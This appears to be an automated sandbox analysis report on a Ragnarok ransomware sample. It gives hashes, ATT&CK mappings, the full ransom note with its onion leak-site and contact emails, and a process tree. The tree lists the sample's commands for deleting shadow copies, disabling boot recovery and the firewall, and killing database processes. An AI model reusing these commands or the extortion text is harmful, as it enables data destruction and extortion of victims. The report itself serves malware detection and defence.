Overview

overview

10

Static

static

730DBBFB.exe

windows7_x64

730DBBFB.exe

windows10_x64

Analysis

  • max time kernel
    62s
  • max time network
    69s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 03:33

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Remote task has failed: Machine shutdown
Report Analysis Logs

General

  • Target

    730DBBFB.exe

  • Size

    169KB

  • MD5

    65c3956288e16bdcc55e3c9c6b94ba5b

  • SHA1

    33aa83e00711a32e0960dcf670ae2fa891049170

  • SHA256

    e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412

  • SHA512

    813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76

Score
10/10
evasionransomware

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!!Read_Me.FC30D.html

Ransom Note
#ALL YOUR FILES ARE ENCRYPTED AND STOLEN BY RAGNAROK Dear Sir Your files are encrypted with RSA4096 and AES encryption algorithm. But don't worry, you can return all your files!! follow the instructions to recover your files Cooperate with us and get the decrypter program as soon as possible will be your best solution. Only our software can decrypt all your encrypted files. What guarantees you have? We take our reputation seriously. We reject any form of deceptionYou can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain any valuable information. When hiring third-party negotiators or recovery companies. listen to what they tell you. try to think. Are they really interested in solving your problems or are they just thinking about their profit and ambitions? By the way.We have stolen lots of your company and your private data which includes doc,xls,pdf,jpg,mdf,sql,pst... Here we upload sample files of your company and your private data on our blog : http://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion/ We promise that if you don't pay within a week, we will package and publish all of your company and your data on our website. We also promise we can decrypt all of your data and delete all your files on internet after your payment. Such leaks of information lead to losses for the company. fines and lawsuits. And don't forget that information can fall into the hands of competitors! For us this is just business and to prove to you our seriousness. Our e-mail: CHRISTIAN1986@TUTANOTA.COM Reserve e-mail: melling@confidential.tips Device ID: =AAAfBTMuAjLwEjLwEDLBh1UQZkQGdELEdzQCNTN3Y0N2EzQyUUN3EUQ0UTOyYjN2gDN4MzM0IUNxI0QDFEMCJjQ1UTO2EUMFREMGZEOGBTRyE0N5gDMDFENBRzN1MENwIERxEjQEBTQEdDRwQUR5ATQCZ0MBljRBdjN1IkMGBDOCRTNBVzMFNjR0MTM0UTNygzQEBzMEJTNFF0QGZjQEhTN1MkRxQTR5MUO2QDMEdTO1UkQFBjMEFEO4IERDJ0Q2YENFNENwgTOBlTR4IENERUM1YkMwU0QwUTM5UENGNzQzIjQzUzM1UjN0YTQ4UDOERER0kTRBhjRzMEM3IURFJDOxYDN3YzMDJzQDNkN2YUQGhjRFlzNDZTRDVUO4MzM1YURwATO4EDO0UkQzYTNwczQGZUN0QDREJzQDlTOEFUOEJEN2kTM5YDO2czN1UEO1U0QEBTRyIkN1EkRzMDNyEDOwgjNwYENBREO0YTMENURxQzMFVDN3ATQ4MjNFRTNGRDRCdjQCNEOwIkMFR0MwAjQENjNxQkRCVjMFFENCRjNzETQFZkN3UEMBljM0U0M2cDO0MUQ4ATRClTN2MjNChTRDFEN1kzQ2YkNEV0N1AzQDZDOBdjRBZDR4cTM2MjN4Q0NxgTM1QEM2MUMwQEODJDNxYTN5UEOxIEN4EURFNUN0YDO2QERzIkRzEjRBVzNCFUR4cTO1EDMFVDR2YzQyIkRGhTNFBDNxgjRFJTOzEkMzETOEREO1AjMxYUNGZkRENUQyEUQzEUMFRjM0YkQFFkMGNDM3MzMxEjQ0UzQGZEMGdTOxkjR5MjM3cTOwUUN0ADNycjNxMkMGZjR5QjQ0IDR1UDR0EjRCVjMDZkQDNzQ2YDOykDNwEDNzM0MENDN4YUQCFzM5Y0NwkzQ5UkMyEDOxczQDNkMzMEMDFDRDFDR5YTOwcTQxUTOzYDNwgTN3gTN0UzMzQUREZkQEhDMFVkM2MERBVkM5UERCdzQFhDOzYDRyADRwMUOFVDO4UTMCRkR0QDRGV0NyY0Q5cjR1kzN5AzNGdDN2ADM5cTNxIUN3UEMzU0QFFjM1czN5YUNCV0Q5MUNzgTMDFDRBZTM0YUNwcjQygDOEhzQ0QERwUjM0IjR3MUNBBTOwEENxITO5ADOwcTQCFTQCNTRGVDOyQTREdTOyIUQyMjRzEER0EUQ5AzQGVENFF0Q0ITMyMUMFZ0Q3MjN2AjQGRENGlTM4ATQyIDO2EUO4QjM2AzQEN0Q5AjNwYUN1EUO1IUNDljMCNzN3IzQyQEN2IjNyMDOzQUQ4ITM2IzN1YzNDRkQzEUR0kDRwYUR0kjNyAzN5gTNzIzN0ITQ2YkMGlTN3IkQBRUR2IUNBNjMDFjNyMDR4MUODRTQ2czN0wyMBBzMBREO3UERBNUMFNzNEFUM2QjQxIkQFhzNBFERCVURDRERCVUMxYTQ4AzNDdzN3IjRDVDNzEDRwQjRwkTO1YzM2UDNFNkM1MDM4kjRDdjQBVEOBNUMxADNBlTMxM0QzEjQ0YjM5M0M1MUR1IkQDVkMDFzMzIUREFER5gDNyYkQykDR0UENEFTQ3ATN5ETNDBzQ3EkM4YTMFBTQFFkRzUjRCVkRDZkNBZkRDZENCFDO4UjQFZEOEhzM1czMBJjNwUERxAzNDFzNFdjREJTOzIENDFUQGFzNCJ0NyADRDVUM2gTNzUEN3ADODFEN0E0QxYzNFVTNCNjM4EkMBFEM0Q0M0gjRxYDODFTREVUM3QERCVDNFFzMzgjMzUEN3IUOCdzQ5YEN1EUO1YER1ATQFlDRycTQzE0MFVkQFBzM0cjNDV0QFNzQ5EUO5UDO2YDRCljM4UUMEFkM0YTMxgjRDJTNEdDNFFkQDFDO5UjREdjNwQkNzkTQ2cTM3cjQDFUR2QjR2UUQ4EDMGlTNENUR0EkQER0QxQjRDRjREJ0QyYTQERUM5IkNGZjQChzNGhDMClDOGVDM2IUQ5QjNBdDODZERCF0Q3IUO5MkQyEEMxATRxgzN5cDRxYjNBJER1I0MwkjMBNzQ2UDN3QjR5IERGJER0YjRzIkRDJTMxYjMEVzQ1QTRyQUM0QUQxgDR4YENGdTQ5YkMDV0N3ADRBFUO0Q0MzQkNDZDM4UUR4EENEVjQDdjQwU0Q1kDOyYUQxADOwQTM2gTQxczMzQEMCVkN1gjMxQkNGdTN4QDR0Y0NBVUMCdTQwEkQCVTQDFURFlDRFF0QFNEO2MEM5EDO1cjM5UTQ3QUN1gTQFNjQ2QTOEFjQ0cjRCJkN2IDNyYzQzQTOFFjNDhzQBV0NCNTRBR0M5UkR5ADOyQDR4IUO3EEOwITQ0YjN1UUR1UDRwkTN1Y0MycTRBhjNFlTQxkDOxQkRBJTOwMEOzczN4AjM0EUQBV0QzMkN2EEMGZjRDZ0M0UUNEhjQCVzQGJDN3QEN5UkNDVEMClTR1IDMBVTN4YDMFRTQwczQyM0M0ATN0YTM4ADRzEEOxEDMBNTR0cTMGVTQ2kDM3YTOwIkNwYDNxYTM3QER5UDR2EjQGRER0YUR0gTQFNkQBlTQGhjMBdDNzgjRFZDRGVDMwETNEFzMxUTQDlTRDdTN2QzM1YTO4QkN5UEMxUkQ1YzM3YTNxETM4gDNxMzMzYDR0E0NwEUR0IDO2ATOwQERERUQwEkMwQ0MDFURClTQGNDR3UERyMkNykTQ4gzMFFUM5YUOwUDRxAjN3M0N2QkM5IjNGdTOyUTQxETO2cDRCJEN2YkQ5kDR3ETM
Emails

CHRISTIAN1986@TUTANOTA.COM

melling@confidential.tips
URLs

http://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion/

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 13 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe
    "C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2680
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3952
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:204
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c bcdedit /set {current} recoveryenabled no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:756
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2416
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
          PID:200
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {current} bootstatuspolicy ignoreallfailures
          3⤵
          • Modifies boot configuration data using bcdedit
          PID:2208
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c taskkill /f /im note*
        2⤵
          PID:3200
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im note*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3244
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im powerpnt*
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im powerpnt*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3912
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c taskkill /f /im winword*
          2⤵
            PID:2316
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im winword*
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2068
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im Exchange*
            2⤵
              PID:1460
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Exchange*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4104
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im excel*
              2⤵
                PID:652
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im excel*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2680
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im sql*
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:264
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im sql*
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3404
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im tomcat*
                2⤵
                  PID:3240
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im tomcat*
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4224
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im apache*
                  2⤵
                    PID:3632
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im apache*
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4244
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im java*
                    2⤵
                      PID:3036
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im java*
                        3⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4212
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im vee*
                      2⤵
                        PID:1564
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im vee*
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4264
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im python*
                        2⤵
                          PID:2676
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im python*
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4292
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im mys*
                          2⤵
                            PID:1832
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im mys*
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4308
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im post*
                            2⤵
                              PID:368
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im post*
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4276
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 0
                              2⤵
                                PID:3116
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1
                                  3⤵
                                  • Runs ping.exe
                                  PID:4216
                                • C:\Windows\SysWOW64\shutdown.exe
                                  shutdown -s -t 0
                                  3⤵
                                    PID:4456
                              • C:\Windows\system32\vssvc.exe
                                C:\Windows\system32\vssvc.exe
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3264
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4784
                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                  1⤵
                                  • Drops file in Windows directory
                                  • Modifies Internet Explorer settings
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4964
                                • C:\Windows\system32\browser_broker.exe
                                  C:\Windows\system32\browser_broker.exe -Embedding
                                  1⤵
                                  • Modifies Internet Explorer settings
                                  PID:5004
                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                  1⤵
                                  • Modifies registry class
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4364
                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                  1⤵
                                  • Modifies Internet Explorer settings
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:268
                                • C:\Windows\system32\LogonUI.exe
                                  "LogonUI.exe" /flags:0x0 /state0:0xa3adc055 /state1:0x41c64e6d
                                  1⤵
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4304
                                • C:\Windows\system32\browser_broker.exe
                                  C:\Windows\system32\browser_broker.exe -Embedding
                                  1⤵
                                    PID:284
                                  • C:\Windows\system32\browser_broker.exe
                                    C:\Windows\system32\browser_broker.exe -Embedding
                                    1⤵
                                      PID:4308

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Initial Access

                                    Execution

                                    Persistence

                                    Modify Existing Service

                                    1
                                    T1031

                                    Privilege Escalation

                                    Defense Evasion

                                    File Deletion

                                    2
                                    T1107

                                    Modify Registry

                                    1
                                    T1112

                                    Credential Access

                                    Discovery

                                    Remote System Discovery

                                    1
                                    T1018

                                    Lateral Movement

                                    Collection

                                    Exfiltration

                                    Command and Control

                                    Impact

                                    Inhibit System Recovery

                                    3
                                    T1490

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\Downloads\!!Read_Me.FC30D.html
                                      MD5

                                      ba44e2bb1da58363895b9e793c2139cc

                                      SHA1

                                      bf3ce91c31e74bdfc2a8d12d348c057b44a3b75a

                                      SHA256

                                      1bfe529206c7ed3d1ae135fd2d49a4ff1b59fa8250661833db74a78257b4f169

                                      SHA512

                                      581e968f409d3864561c0db437728b5ab4bbe9fc25a081aa64bb42946f34fbba28ee71dee71d49d28a8a7a4abd1d57067da20b7e02fb60a42709b2c4ef085095

                                      Download Submit
                                    • memory/200-122-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/204-121-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/264-131-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/368-137-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/640-114-0x0000000010000000-0x000000001001C000-memory.dmp
                                      Filesize

                                      112KB

                                      Download
                                    • memory/652-129-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/696-118-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/756-119-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/1460-130-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/1564-136-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/1832-138-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2068-143-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2132-127-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2208-124-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2224-120-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2316-128-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2416-123-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2676-135-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2680-125-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/2680-141-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3036-134-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3116-154-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3200-126-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3240-132-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3244-142-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3404-140-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3632-133-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3912-139-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/3952-117-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4016-116-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4104-144-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4212-145-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4216-155-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4224-146-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4244-147-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4264-148-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4276-149-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4292-150-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4308-151-0x0000000000000000-mapping.dmp
                                      Download
                                    • memory/4456-156-0x0000000000000000-mapping.dmp
                                      Download